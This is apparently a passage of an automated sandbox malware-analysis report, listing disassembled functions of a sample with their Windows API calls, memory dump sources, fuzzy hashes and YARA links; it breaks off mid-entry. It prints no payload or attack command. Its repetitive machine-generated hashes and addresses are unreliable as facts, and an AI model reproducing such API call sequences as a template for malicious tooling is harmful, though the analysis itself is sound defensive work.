                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3869813825-0
                                                                                                                                • Opcode ID: 2b65c3b5391a3e9474dc2d4c3b68935a4ab8269d0ad76bc81a7386df465589e1
                                                                                                                                • Instruction ID: 8692d0bbbe94e2b1ddcac6972960659d369ae97ac3c737d940314ebe486ba043
                                                                                                                                • Opcode Fuzzy Hash: 2b65c3b5391a3e9474dc2d4c3b68935a4ab8269d0ad76bc81a7386df465589e1
                                                                                                                                • Instruction Fuzzy Hash: F6514071900709AFDB209FA8CD89F6EBBF5FF04714F104529E996A65A0C774A948EF10
                                                                                                                                Function 00F7CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F7CD0B
                                                                                                                                • DestroyWindow.USER32(00000000,?), ref: 00F7CD83
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F7CE04
                                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F7CE26
                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F7CE35
                                                                                                                                • DestroyWindow.USER32(?), ref: 00F7CE52
                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F10000,00000000), ref: 00F7CE85
                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F7CEA4
                                                                                                                                • GetDesktopWindow.USER32 ref: 00F7CEB9
                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00F7CEC0
                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F7CED2
                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F7CEEA
                                                                                                                                  • Part of subcall function 00F2B155: GetWindowLongW.USER32(?,000000EB), ref: 00F2B166
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                                • API String ID: 1297703922-3619404913
                                                                                                                                • Opcode ID: fc730eceed690c6150728150d9182a34c832c59ffb1f66220a6d6433a69bd91e
                                                                                                                                • Instruction ID: c49532e5c909ab7622073d48927e47b003f8acdc6d558c266f20db78db6432ad
                                                                                                                                • Opcode Fuzzy Hash: fc730eceed690c6150728150d9182a34c832c59ffb1f66220a6d6433a69bd91e
                                                                                                                                • Instruction Fuzzy Hash: 8071CE71540309AFE724CF28CC45FAA3BE6FB88714F54451EF989972A1DB70E901EB62
                                                                                                                                Function 00F5B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00F5B46D
                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00F5B476
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F5B482
                                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F5B561
                                                                                                                                • __swprintf.LIBCMT ref: 00F5B591
                                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00F5B5BD
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00F5B63F
                                                                                                                                • SysFreeString.OLEAUT32(00000016), ref: 00F5B6D1
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F5B727
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F5B736
                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00F5B772
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                • API String ID: 3730832054-3931177956
                                                                                                                                • Opcode ID: ebd441a1ccba3109549fbc5d0cb0fd1a018d93b124392fd57c5ed985482c70d9
                                                                                                                                • Instruction ID: a563e020522b291ea10e8d84cb4589c4fce7a498248d11e18a99a63adf066c12
                                                                                                                                • Opcode Fuzzy Hash: ebd441a1ccba3109549fbc5d0cb0fd1a018d93b124392fd57c5ed985482c70d9
                                                                                                                                • Instruction Fuzzy Hash: 0EC14932900616DBCB20DF65D884B79B7B4FF06712F248456EE059B541DB74EC48FBA1
                                                                                                                                Function 00F76F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00F76FF9
                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F77044
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                • API String ID: 3974292440-4258414348
                                                                                                                                • Opcode ID: d9167df3242d556386f6053716a1236df3cae310c3c59802fc7ed133f046bed1
                                                                                                                                • Instruction ID: 80fad58234c98e01bbc9c1718f82bfec815f038ed360c9612eac2504d9b13317
                                                                                                                                • Opcode Fuzzy Hash: d9167df3242d556386f6053716a1236df3cae310c3c59802fc7ed133f046bed1
                                                                                                                                • Instruction Fuzzy Hash: BE9183346143019FC704EF14CD51BA9B7A2AF94360F14886DF8565B393CB39ED4AEB42
                                                                                                                                Function 00F7E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F7E3BB
                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F79615,?), ref: 00F7E417
                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F7E457
                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F7E49C
                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F7E4D3
                                                                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,00F79615,?), ref: 00F7E4DF
                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F7E4EF
                                                                                                                                • DestroyCursor.USER32(?), ref: 00F7E4FE
                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F7E51B
                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F7E527
                                                                                                                                  • Part of subcall function 00F31BC7: __wcsicmp_l.LIBCMT ref: 00F31C50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                • API String ID: 3907162815-1154884017
                                                                                                                                • Opcode ID: b0496332992fbe53dfd6ccbfc470dafd58889413a02e16581b94d05a539db3ed
                                                                                                                                • Instruction ID: c7ae5f5d19315488b25dc09ba77d2bb68d9061bb639be65d90f228cf6f734b0b
                                                                                                                                • Opcode Fuzzy Hash: b0496332992fbe53dfd6ccbfc470dafd58889413a02e16581b94d05a539db3ed
                                                                                                                                • Instruction Fuzzy Hash: C5618E71940219BAEB14DF64DC46FEA7BA8BB08720F208157F919E70D1DB74A980E7A1
                                                                                                                                Function 00F60E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00F60EFF
                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F60F0F
                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F60F1B
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F60F79
                                                                                                                                • _wcscat.LIBCMT ref: 00F60F91
                                                                                                                                • _wcscat.LIBCMT ref: 00F60FA3
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00F60FB8
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F60FCC
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F60FFE
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F6101F
                                                                                                                                • _wcscpy.LIBCMT ref: 00F6102B
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F6106A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 3566783562-438819550
                                                                                                                                • Opcode ID: b5fe4a18474299765827dadbad2952b6f7ae478ce615d500855fadf7d494c6da
                                                                                                                                • Instruction ID: d97ee6d2149ced3fb9f9dc806b4cb5e338a050c98760f913b94e24aa3196fdcd
                                                                                                                                • Opcode Fuzzy Hash: b5fe4a18474299765827dadbad2952b6f7ae478ce615d500855fadf7d494c6da
                                                                                                                                • Instruction Fuzzy Hash: 9A616EB2504305AFCB10EF60C845A9FB7E8FF89320F14891EF99987251EB35E945DB92
                                                                                                                                Function 00F5DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00F5DB26
                                                                                                                                • GetDriveTypeW.KERNEL32 ref: 00F5DB73
                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5DBBB
                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5DBF2
                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5DC20
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                • API String ID: 2698844021-4113822522
                                                                                                                                • Opcode ID: 1747682381c5d8ea16244d927853eb7833f6a3558a7c84b950d563e44ab07e34
                                                                                                                                • Instruction ID: c3f7c4e232a13c8df73e2c18ecbf9a1702c9b3476a3326c3fe66b9389a61d4d8
                                                                                                                                • Opcode Fuzzy Hash: 1747682381c5d8ea16244d927853eb7833f6a3558a7c84b950d563e44ab07e34
                                                                                                                                • Instruction Fuzzy Hash: 19515C71504305AFC700EF10CD9299AB7F5EF88758F10886CF89697261DB35EE09EB82
                                                                                                                                Function 00F53110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F84085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00F53145
                                                                                                                                • LoadStringW.USER32(00000000,?,00F84085,00000016), ref: 00F5314E
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00F84085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00F53170
                                                                                                                                • LoadStringW.USER32(00000000,?,00F84085,00000016), ref: 00F53173
                                                                                                                                • __swprintf.LIBCMT ref: 00F531B3
                                                                                                                                • __swprintf.LIBCMT ref: 00F531C5
                                                                                                                                • _wprintf.LIBCMT ref: 00F5326C
                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F53283
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                • API String ID: 984253442-2268648507
                                                                                                                                • Opcode ID: 3a4fffcb53f6a48e4c76cd9596a2d3279db3b97530c5ca302c6c198d4199f36e
                                                                                                                                • Instruction ID: ff7e121c9edd80adc4f9f9b09da999640f4900a745d3a6eacc5e4d9cb41db8c2
                                                                                                                                • Opcode Fuzzy Hash: 3a4fffcb53f6a48e4c76cd9596a2d3279db3b97530c5ca302c6c198d4199f36e
                                                                                                                                • Instruction Fuzzy Hash: C241A272900209AACB04FBE0CD97EDEB779AF14741F500065F601B2092DE79AF48FAA1
                                                                                                                                Function 00F4957D Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 884005220-0
                                                                                                                                • Opcode ID: 6ac59636fe94e78041ddb7c106aa6401de3af530991be2e3d3682995c6588069
                                                                                                                                • Instruction ID: 8ed3baf1e41742de2a6c8415f0339a49df04d800e604b8cebb93bc8789d058e5
                                                                                                                                • Opcode Fuzzy Hash: 6ac59636fe94e78041ddb7c106aa6401de3af530991be2e3d3682995c6588069
                                                                                                                                • Instruction Fuzzy Hash: 3661C472A09316AFEB219F38DC42B6B7FA4EF01330F210116EC419B191DBB9D941BB64
                                                                                                                                Function 00F4B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F4B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F4B903
                                                                                                                                  • Part of subcall function 00F4B8E7: GetLastError.KERNEL32(?,00F4B3CB,?,?,?), ref: 00F4B90D
                                                                                                                                  • Part of subcall function 00F4B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00F4B3CB,?,?,?), ref: 00F4B91C
                                                                                                                                  • Part of subcall function 00F4B8E7: RtlAllocateHeap.NTDLL(00000000,?,00F4B3CB), ref: 00F4B923
                                                                                                                                  • Part of subcall function 00F4B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F4B93A
                                                                                                                                  • Part of subcall function 00F4B982: GetProcessHeap.KERNEL32(00000008,00F4B3E1,00000000,00000000,?,00F4B3E1,?), ref: 00F4B98E
                                                                                                                                  • Part of subcall function 00F4B982: RtlAllocateHeap.NTDLL(00000000,?,00F4B3E1), ref: 00F4B995
                                                                                                                                  • Part of subcall function 00F4B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F4B3E1,?), ref: 00F4B9A6
                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F4B5F7
                                                                                                                                • _memset.LIBCMT ref: 00F4B60C
                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F4B62B
                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00F4B63C
                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00F4B679
                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F4B695
                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00F4B6B2
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F4B6C1
                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00F4B6C8
                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F4B6E9
                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00F4B6F0
                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F4B721
                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F4B747
                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F4B75B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2347767575-0
                                                                                                                                • Opcode ID: 6311a4377fdfd951cf35bb2a64258eddcf619a6b744812af3222db11a55e320e
                                                                                                                                • Instruction ID: 5049344236121cda68988a8ddb181e0676a7426b51cabee0a7e19e616b08af78
                                                                                                                                • Opcode Fuzzy Hash: 6311a4377fdfd951cf35bb2a64258eddcf619a6b744812af3222db11a55e320e
                                                                                                                                • Instruction Fuzzy Hash: E4516A71900209ABDF009FA0DC85EEEBB79FF44324F14816AED15A72A1DB35DA05EB60
                                                                                                                                Function 00F6A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(00000000), ref: 00F6A2DD
                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F6A2E9
                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00F6A2F5
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00F6A302
                                                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F6A356
                                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00F6A392
                                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F6A3B6
                                                                                                                                • SelectObject.GDI32(00000006,?), ref: 00F6A3BE
                                                                                                                                • DeleteObject.GDI32(?), ref: 00F6A3C7
                                                                                                                                • DeleteDC.GDI32(00000006), ref: 00F6A3CE
                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00F6A3D9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
